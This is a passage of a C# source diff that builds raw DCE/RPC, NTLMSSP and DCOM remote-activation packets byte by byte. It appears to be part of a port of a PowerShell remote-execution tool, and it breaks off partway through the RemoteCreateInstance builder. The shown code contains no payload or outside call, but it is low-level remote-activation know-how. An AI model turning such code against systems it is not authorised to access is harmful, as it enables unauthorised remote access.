+            packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
+            packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items);
+            packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID);
+            packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 });
+            packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 });
+            packet_RPCBind.Add("RPCBind_Interface", packet_UUID);
+            packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version);
+            packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
+            packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+
+
+            if (packet_num_ctx_items[0] == 2)
+            {
+                packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
+                packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            }
+            else if (packet_num_ctx_items[0] == 3)
+            {
+                packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+                packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+                packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
+                packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 });
+                packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
+                packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
+            }
+
+            if (packet_call_ID == 3)
+            {
+                packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
+                packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 });
+                packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
+                packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
+            }
+
+            return packet_RPCBind;
+        }
+        public static OrderedDictionary RPCAuth3(byte[] packet_NTLMSSP)
+        {
+            //4 extra bytes?
+            byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLMSSP.Length);
+            packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[0], packet_NTLMSSP_length[1] };
+
+            byte[] packet_RPC_length = BitConverter.GetBytes(packet_NTLMSSP.Length + 28);
+            packet_RPC_length = new byte[] { packet_RPC_length[0], packet_RPC_length[1] };
+
+
+            OrderedDictionary packet_RPCAuth3 = new OrderedDictionary();
+            packet_RPCAuth3.Add("RPCAUTH3_Version", new byte[] { 0x05 });
+            packet_RPCAuth3.Add("RPCAUTH3_VersionMinor", new byte[] { 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_PacketType", new byte[] { 0x10 });
+            packet_RPCAuth3.Add("RPCAUTH3_PacketFlags", new byte[] { 0x03 });
+            packet_RPCAuth3.Add("RPCAUTH3_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_FragLength", packet_RPC_length);
+            packet_RPCAuth3.Add("RPCAUTH3_AuthLength", packet_NTLMSSP_length);
+            packet_RPCAuth3.Add("RPCAUTH3_CallID", new byte[] { 0x03, 0x00, 0x00, 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_MaxXmitFrag", new byte[] { 0xd0, 0x16 });
+            packet_RPCAuth3.Add("RPCAUTH3_MaxRecvFrag", new byte[] { 0xd0, 0x16 });
+            packet_RPCAuth3.Add("RPCAUTH3_AuthType", new byte[] { 0x0a });
+            packet_RPCAuth3.Add("RPCAUTH3_AuthLevel", new byte[] { 0x02 });
+            packet_RPCAuth3.Add("RPCAUTH3_AuthPadLength", new byte[] { 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_AuthReserved", new byte[] { 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_RPCAuth3.Add("RPCAUTH3_NTLMSSP", packet_NTLMSSP);
+
+            return packet_RPCAuth3;
+        }
+        public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
+        {
+            int packet_full_auth_length;
+            byte[] packet_write_length;
+            byte[] packet_alloc_hint;
+            if (packet_auth_length > 0)
+            {
+                packet_full_auth_length = packet_auth_length + packet_auth_padding + 8;
+            }
+            else
+            {
+                packet_full_auth_length = 0;
+            }
+
+
+            if (packet_data != null)
+            {
+                packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length);
+                packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length);
+            }
+            else
+            {
+                //Doing this because sometimes he calls it with 7 params instead of 8, which Powershell outputs the length to 0.
+                packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length);
+                packet_alloc_hint = BitConverter.GetBytes(packet_service_length);
+
+            }
+
+            byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
+            byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length);
+            byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] };
+
+            OrderedDictionary packet_RPCRequest = new OrderedDictionary();
+            packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 });
+            packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 });
+            packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 });
+            packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags);
+            packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length);
+            packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3);
+            packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID);
+            packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint);
+            packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID);
+            packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum);
+
+            if (packet_data != null && packet_data.Length > 0)
+            {
+                packet_RPCRequest.Add("RPCRequest_Data", packet_data);
+            }
+
+            return packet_RPCRequest;
+
+        }
+        public static OrderedDictionary RPCAlterContext(byte[] packet_assoc_group, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_interface_UUID)
+        {
+            OrderedDictionary packet_RPCAlterContext = new OrderedDictionary();
+            packet_RPCAlterContext.Add("RPCAlterContext_Version", new byte[] { 0x05 });
+            packet_RPCAlterContext.Add("RPCAlterContext_VersionMinor", new byte[] { 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_PacketType", new byte[] { 0x0e });
+            packet_RPCAlterContext.Add("RPCAlterContext_PacketFlags", new byte[] { 0x03 });
+            packet_RPCAlterContext.Add("RPCAlterContext_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_FragLength", new byte[] { 0x48, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_AuthLength", new byte[] { 0x00, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_CallID", packet_call_ID);
+            packet_RPCAlterContext.Add("RPCAlterContext_MaxXmitFrag", new byte[] { 0xd0, 0x16 });
+            packet_RPCAlterContext.Add("RPCAlterContext_MaxRecvFrag", new byte[] { 0xd0, 0x16 });
+            packet_RPCAlterContext.Add("RPCAlterContext_AssocGroup", packet_assoc_group);
+            packet_RPCAlterContext.Add("RPCAlterContext_NumCtxItems", new byte[] { 0x01 });
+            packet_RPCAlterContext.Add("RPCAlterContext_Unknown", new byte[] { 0x00, 0x00, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_ContextID", packet_context_ID);
+            packet_RPCAlterContext.Add("RPCAlterContext_NumTransItems", new byte[] { 0x01 });
+            packet_RPCAlterContext.Add("RPCAlterContext_Unknown2", new byte[] { 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_Interface", packet_interface_UUID);
+            packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVer", new byte[] { 0x00, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
+            packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
+            packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+
+            packet_RPCAlterContext.Add("", new byte[] { });
+
+            return packet_RPCAlterContext;
+        }
+        public static OrderedDictionary NTLMSSPVerifier(int packet_auth_padding, byte[] packet_auth_level, byte[] packet_sequence_number)
+        {
+            OrderedDictionary packet_NTLMSSPVerifier = new OrderedDictionary();
+            byte[] packet_auth_pad_length = null;
+
+            if (packet_auth_padding == 4)
+            {
+                packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                packet_auth_pad_length = new byte[] { 0x04 };
+            }
+            else if (packet_auth_padding == 8)
+            {
+                packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_auth_pad_length = new byte[] { 0x08 };
+            }
+            else if (packet_auth_padding == 12)
+            {
+                packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_auth_pad_length = new byte[] { 0x0c };
+            }
+            else
+            {
+                packet_auth_pad_length = new byte[] { 0x00 };
+            }
+
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthType", new byte[] { 0x0a });
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthLevel", packet_auth_level);
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadLen", packet_auth_pad_length);
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthReserved", new byte[] { 0x00 });
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierVersionNumber", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierChecksum", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierSequenceNumber", packet_sequence_number);
+
+            return packet_NTLMSSPVerifier;
+        }
+        public static OrderedDictionary DCOMRemQueryInterface(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IID)
+        {
+            OrderedDictionary packet_DCOMRemQueryInterface = new OrderedDictionary();
+
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMajor", new byte[] { 0x05, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMinor", new byte[] { 0x07, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_CausalityID", packet_causality_ID);
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IPID", packet_IPID);
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Refs", new byte[] { 0x05, 0x00, 0x00, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IIDs", new byte[] { 0x01, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Unknown", new byte[] { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_", packet_IID);
+
+            return packet_DCOMRemQueryInterface;
+        }
+        public static OrderedDictionary DCOMRemRelease(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IPID2)
+        {
+            OrderedDictionary packet_DCOMRemRelease = new OrderedDictionary();
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_VersionMajor", new byte[] { 0x05, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_VersionMinor", new byte[] { 0x07, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_CausalityID", packet_causality_ID);
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Unknown", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_InterfaceRefs", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_IPID", packet_IPID);
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PublicRefs", new byte[] { 0x05, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PrivateRefs", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_packet_IPID2", packet_IPID2);
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PublicRefs2", new byte[] { 0x05, 0x00, 0x00, 0x00 });
+            packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PrivateRefs2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            return packet_DCOMRemRelease;
+        }
+        public static OrderedDictionary DCOMRemoteCreateInstance(byte[] packet_causality_ID, string packet_target)
+        {
+
+            byte[] packet_target_unicode = Encoding.Unicode.GetBytes(packet_target);
+            byte[] packet_target_length = BitConverter.GetBytes(packet_target.Length + 1);
+            double bytesize = (Math.Truncate((double)packet_target_unicode.Length / 8 + 1) * 8) - packet_target_unicode.Length;
+            byte[] nulls = new byte[Convert.ToInt32(bytesize)];
+            packet_target_unicode = Utilities.CombineByteArray(packet_target_unicode, nulls);
+            byte[] packet_cntdata = BitConverter.GetBytes(packet_target_unicode.Length + 720);
+            byte[] packet_size = BitConverter.GetBytes(packet_target_unicode.Length + 680);
+            byte[] packet_total_size = BitConverter.GetBytes(packet_target_unicode.Length + 664);
+            byte[] packet_private_header = Utilities.CombineByteArray((BitConverter.GetBytes(packet_target_unicode.Length + 40)), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            byte[] packet_property_data_size = BitConverter.GetBytes(packet_target_unicode.Length + 56);
+
+            OrderedDictionary packet_DCOMRemoteCreateInstance = new OrderedDictionary();
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMajor", new byte[] { 0x05, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMinor", new byte[] { 0x07, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMFlags", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMCausalityID", packet_causality_ID);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown3", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown4", packet_cntdata);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCntData", packet_cntdata);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFIID", new byte[] { 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCLSID", new byte[] { 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCBExtension", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFSize", packet_size);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize", packet_total_size);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader", new byte[] { 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize", packet_total_size);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize", new byte[] { 0xc0, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs", new byte[] { 0x06, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsInfoClsid", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNULLPointer", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid", new byte[] { 0xb9, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid2", new byte[] { 0xab, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid3", new byte[] { 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid4", new byte[] { 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid5", new byte[] { 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid6", new byte[] { 0xaa, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize", new byte[] { 0x68, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize2", new byte[] { 0x58, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize3", new byte[] { 0x90, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize4", packet_property_data_size);
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize5", new byte[] { 0x20, 0x00, 0x00, 0x00 });
+            packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize6", new byte[] { 0x30, 0x00, 0x00, 0x00 });
